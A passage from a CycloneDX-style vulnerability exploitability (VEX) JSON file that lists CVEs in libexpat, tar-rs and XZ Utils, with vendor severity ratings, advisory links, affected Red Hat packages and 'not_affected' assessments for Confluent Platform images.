          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-32776",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        476
      ],
      "description": "libexpat before 2.7.5 allows a NULL pointer dereference with empty external parameter entity content.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-32776"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-32776"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1158"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1159"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32776"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32776"
        }
      ],
      "published": "2026-03-16T14:19:44+00:00",
      "updated": "2026-07-14T13:18:49+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-32777",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        835
      ],
      "description": "libexpat before 2.7.5 allows an infinite loop while parsing DTD content.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-32777"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-32777"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/issues/1161"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1159"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1162"
        },
        {
          "url": "https://issues.oss-fuzz.com/issues/486993411"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32777"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32777"
        }
      ],
      "published": "2026-03-16T14:19:44+00:00",
      "updated": "2026-07-14T13:18:49+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-32778",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        476
      ],
      "description": "libexpat before 2.7.5 allows a NULL pointer dereference in the function setContext on retry after an earlier ouf-of-memory condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-32778"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-32778"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1159"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1163"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32778"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32778"
        }
      ],
      "published": "2026-03-16T14:19:44+00:00",
      "updated": "2026-07-14T13:18:49+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-33056",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        61
      ],
      "description": "tar-rs is a tar archive reading/writing library for Rust. In versions 0.4.44 and below, when unpacking a tar archive, the tar crate's unpack_dir function uses fs::metadata() to check whether a path that already exists is a directory. Because fs::metadata() follows symbolic links, a crafted tarball containing a symlink entry followed by a directory entry with the same name causes the crate to treat the symlink target as a valid existing directory \u2014 and subsequently apply chmod to it. This allows an attacker to modify the permissions of arbitrary directories outside the extraction root. This issue has been fixed in version 0.4.45.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-33056"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-33056"
        },
        {
          "url": "https://github.com/alexcrichton/tar-rs"
        },
        {
          "url": "https://github.com/alexcrichton/tar-rs/commit/17b1fd84e632071cb8eef9d3709bf347bd266446"
        },
        {
          "url": "https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-j4xf-2g29-59ph"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33056"
        },
        {
          "url": "https://rustsec.org/advisories/RUSTSEC-2026-0067.html"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8138-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8139-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8168-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33056"
        }
      ],
      "published": "2026-03-20T08:16:11+00:00",
      "updated": "2026-06-17T10:36:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.34-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-34743",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        122
      ],
      "description": "XZ Utils provide a general-purpose data-compression library plus command-line tools. Prior to version 5.8.3, if lzma_index_decoder() was used to decode an Index that contained no Records, the resulting lzma_index was left in a state where where a subsequent lzma_index_append() would allocate too little memory, and a buffer overflow would occur. This issue has been patched in version 5.8.3.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-34743"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/31/13"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-34743"
        },
        {
          "url": "https://github.com/tukaani-project/xz/commit/c8c22869e780ff57c96b46939c3d79ff99395f87"
        },
        {
          "url": "https://github.com/tukaani-project/xz/releases/tag/v5.8.3"
        },
        {
          "url": "https://github.com/tukaani-project/xz/security/advisories/GHSA-x872-m794-cxhv"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2026/07/msg00034.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34743"
        },
        {
          "url": "https://tukaani.org/xz/index-append-overflow.html"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8362-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-34743"
        }
      ],
      "published": "2026-04-02T19:21:33+00:00",
      "updated": "2026-07-24T21:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "5.2.5-8.el9_0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
